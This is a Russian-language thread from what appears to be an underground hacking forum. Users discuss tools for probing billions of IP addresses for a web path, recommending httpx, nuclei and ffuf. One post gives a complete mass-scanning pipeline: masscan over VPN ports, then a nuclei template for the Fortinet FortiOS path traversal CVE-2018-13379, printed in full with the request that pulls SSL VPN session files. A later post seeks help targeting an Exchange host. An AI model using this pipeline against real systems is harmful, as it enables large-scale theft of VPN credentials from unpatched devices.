• XSS.stack #1 – первый литературный журнал от юзеров форума

Web, наличие пути

Encommerce

(L3) cache
Пользователь
Регистрация
25.11.2022
Сообщения
235
Реакции
97
Нужено проверить множество адресов на наличие определенного пути (https://ip:port/foo/bar)
Скрипт на питоне сам могу написать
Может есть что-то побыстрее, аля масскан для веба?

Не бейте палками, ес че, такими вещами не занимаюсь обычно)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Питон и многопоточность, вроде хорошо этот вариант справляется.
 
Питон и многопоточность, вроде хорошо этот вариант справляется.
async скорее, но мне нужно пару миллиардов ip чекнуть. Могу конечно на расте написать, но это время, а время деньги...
 
Многопоток. Всё упирается в сетевой канал)
Сомневаюсь, что питон осилит канал 3-5гбит, хотя это не так важно. Возможно я к нему прибегну в итоге, но мне бы готовое решение :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Сомневаюсь, что питон осилит канал 3-5гбит
тогда C + libcurl + многопоток)
Попробуй wfuzz. Там был многопоток (только вот не знаю будет ли оно работать на урлы из листа).
урлы из листа: https://github.com/xmendez/wfuzz/issues/17
 
тогда C + libcurl + многопоток)
Попробуй wfuzz. Там был многопоток (только вот не знаю будет ли оно работать на урлы из листа).
урлы из листа: https://github.com/xmendez/wfuzz/issues/17
Мне растик как-то больше по душе. Ладно, попробую запилить побыстренькому. Залью сюда, как доделаю (если доделаю)
 
Есть замечательная тулза - nuclei
Работает по .yaml шаблонам ака темплейты
Можешь написать свой темплейт или воспользоваться билдером - poc.xray.cool
 
Есть замечательная тулза - nuclei
Работает по .yaml шаблонам ака темплейты
Можешь написать свой темплейт или воспользоваться билдером - poc.xray.cool
Нуклей замечательный, но тут больше подойдет httpx от его же авторов
Он и быстрее, количество потоков там можно настроить, а потом просто отфильтровать параметрами по ответу 200
Либо ffuf еще как вариант
За билдер спасибо, я намучался с этим ямлом уже
 
Нуклей замечательный, но тут больше подойдет httpx от его же авторов
Он и быстрее, количество потоков там можно настроить, а потом просто отфильтровать параметрами по ответу 200
Либо ffuf еще как вариант
За билдер спасибо, я намучался с этим ямлом уже
httpx подошел под мои цели, спасибо!

Залью сюда, как доделаю
С openssl какие-то лютые траблы на винде. Пока пытался собрать проект все желание отпало :(

Если кто-то сталкивался с проблемой, при которой скрипты сборки с зависимостями от openssl/openssl-sys завершаются с ошибкой, буду благодарен за помощь. Что-то мне подсказывает, что это распространенная проблема, но информации в инете не так много (
 
Example:

1. sudo masscan -p4443,4455,10443,8443,443 -Pn -sS -iL ranges.txt -oL CVE-2018-13379 --rate 10000 --excludefile block.txt
2. grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" CVE-2018-13379 > CVE-2018-13379_list
3. nuclei -l CVE-2018-13379_list -t nuclei-templates/cves/2018/CVE-2018-13379.yaml > vuln_CVE-2018-13379

Just edit the yaml for each port:

YAML:
id: CVE-2018-13379

info:
  name: Fortinet FortiOS - Credentials Disclosure
  author: organiccrap
  severity: critical
  description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
  reference:
    - https://fortiguard.com/advisory/FG-IR-18-384
    - https://www.fortiguard.com/psirt/FG-IR-20-233
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-13379
    cwe-id: CWE-22
  metadata:
    verified: true
    shodan-query: http.html:"/remote/login" "xxxxxxxx"
  tags: cve,cve2018,fortios,lfi,kev

requests:
  - method: GET
    path:
      - "{{BaseURL}}:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"

    matchers:
      - type: regex
        part: body
        regex:
          - '^var fgt_lang ='
# Enhanced by mp on 2022/05/12
 
Нужено проверить множество адресов на наличие определенного пути (https://ip:port/foo/bar)
Скрипт на питоне сам могу написать
Может есть что-то побыстрее, аля масскан для веба?

Не бейте палками, ес че, такими вещами не занимаюсь обычно)
Если надо "побыстрее", то логичней искать по уже накачанному другими.
 
Есть замечательная тулза - nuclei
Работает по .yaml шаблонам ака темплейты
Можешь написать свой темплейт или воспользоваться билдером - poc.xray.cool
Не подскажешь пж, составялю YAML при помощи билдера для уязвимого хоста, полностью есть типовой запрос https 443, из него выделяю из html
<link rel="shortcut icon" href="/owa/auth/15.2.221/themes/resources/favicon.ico , вставляю в шаблон ( пробовал через path, body, много как ), но nuclei не определяет уязвимость в хосте( точно есть! ). Кстати стандартный темплейт данной cve от nuclei не работает, поэтому решил написать самостоятельно, мало опыта в написании.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх